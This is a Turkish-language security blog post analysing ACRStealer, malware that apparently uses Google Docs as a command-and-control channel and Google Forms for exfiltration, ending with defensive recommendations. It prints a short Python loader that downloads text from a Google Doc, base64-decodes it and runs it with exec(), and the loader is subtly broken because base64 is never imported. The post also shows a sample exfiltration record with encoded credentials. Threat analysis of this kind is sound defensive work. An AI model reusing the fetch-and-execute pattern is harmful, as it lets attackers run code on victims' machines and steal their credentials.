Giriş:
Son zamanlarda siber saldırılar, kötü niyetli yazılımlar aracılığıyla daha karmaşık ve sofistike hale gelmiştir. ACRStealer adlı yeni bir kötü amaçlı yazılım türü, Google Docs’u komut ve kontrol (C2) sunucusu olarak kullanarak kurbanlardan hassas giriş bilgilerini çalmaktadır. Bu yöntem, itibarlı bir platformu suistimal ederek geleneksel güvenlik önlemlerini geçmeyi hedeflemektedir.
Teknik Açıklamalar:
ACRStealer, Google Docs API’lerini kullanarak çalışmaktadır. Bu, kötü amaçlı yazılımın, Google Drive üzerinden paylaşılan normal görünümlü belgeler içine zararlı betikler yerleştirerek hedef sistemlere sızmasını sağlar. Kurban, böyle bir belgeyi açtığında, ACRStealer bir dizi kötü amaçlı yükü alarak çalışmaya başlar.
Bu yazılım, Google’ın OAuth 2.0 çerçevesini kullanarak belgelerle etkileşimde bulunur. Belirli bir belge kimliği içeren yapılandırmalar aracılığıyla, zararlı komutları içeren bu belgelerden veri çekmektedir. Aşağıda, ACRStealer’ın komut alma işlemini gerçekleştiren bir Python betiği örneği yer almaktadır:
“`
import requests
doc_id = “1AbC2dEfGhI3JkL4MnOpQrStUvWxYz” # Kötü niyetli Google Doküman ID’si
url = f”https://docs.google.com/document/d/{doc_id}/export?format=txt”
response = requests.get(url)
commands = response.text.split(‘\n’)
exec(base64.b64decode(commands[0])) # Payload’ı çözüp yürütme
“`
Yukarıdaki skript, bir Google dokümanından Base64 kodlanmış bir yük alıp bunu çözüp kurbanın makinesinde çalıştırmaktadır. Ayrıca, saldırganlar AES-256-CBC şifrelemesini kullanarak komutları gizlemekte ve bu, tersine mühendisliği zorlaştırmaktadır. Ancak, tüm örneklerde kullanılan sabit bir başlangıç vektörü (IV) bulunmaktadır: `4A4B4C4D4E4F5050`. Bu, saldırının kripto uygulaması açısından potansiyel bir zayıflık göstermektedir.
Örnekler:
ACRStealer, topladığı verileri JSON formatında Google Formları aracılığıyla sızdırmaktadır. Aşağıda, toplanan kimlik bilgilerini içeren bir örnek veri yapısı verilmiştir:
“`
{
“timestamp”: “2025-02-21T20:01:00Z”,
“user_agent”: “Mozilla/5.0”,
“feedback”: “ZW5jcnlwdGVkLWNyZWRlbnRpYWxz-…” // Base64 kodlanmış kimlik bilgileri
}
“`
Bu örnek, normal bir tarayıcı trafiği olarak görünerek veri kaybı önleme (DLP) sistemlerini atlatmaktadır.
Önlemler & En İyi Uygulamalar:
ACRStealer gibi saldırılara karşı savunma almak, siber güvenlik stratejilerinin önemli bir parçasıdır. Şirketlerin aşağıdaki önlemleri alması önerilmektedir:
1. Google Drive API aktivitelerini izlemek; anormal belge erişimleri için dikkatli olmak.
2. Çok faktörlü kimlik doğrulaması (MFA) kullanmak ve üçüncü taraf uygulama izinlerini kısıtlamak.
3. Kullanıcı eğitimleri düzenleyerek çalışanları bu tür saldırılar hakkında bilgilendirmek.
4. Kötü niyetli içerik tarayıcıları kullanarak şüpheli belgeleri tespit etmek.
Sonuç & Özet:
ACRStealer, Google Docs gibi saygın platformları kullanarak kurbanların hassas bilgilerini çalma potansiyeline sahip oldukça gelişmiş bir tehdit örneğidir. Bu tür zararlı yazılımlara karşı korunmak için proaktif bir yaklaşım benimsenmesi ve güvenlik önlemlerinin artırılması kritik öneme sahiptir. Geleneksel güvenlik araçları, bu tür atacılara yanıt vermekte zorlandığı için kullanıcı eğitimi ve aktif tehdit avcılığı, savunmanın temel direkleri olmalıdır.
Kaynakça:
– ThreatSec raporu ve ASEC güvenlik araştırmaları. [Collection]
About the Author
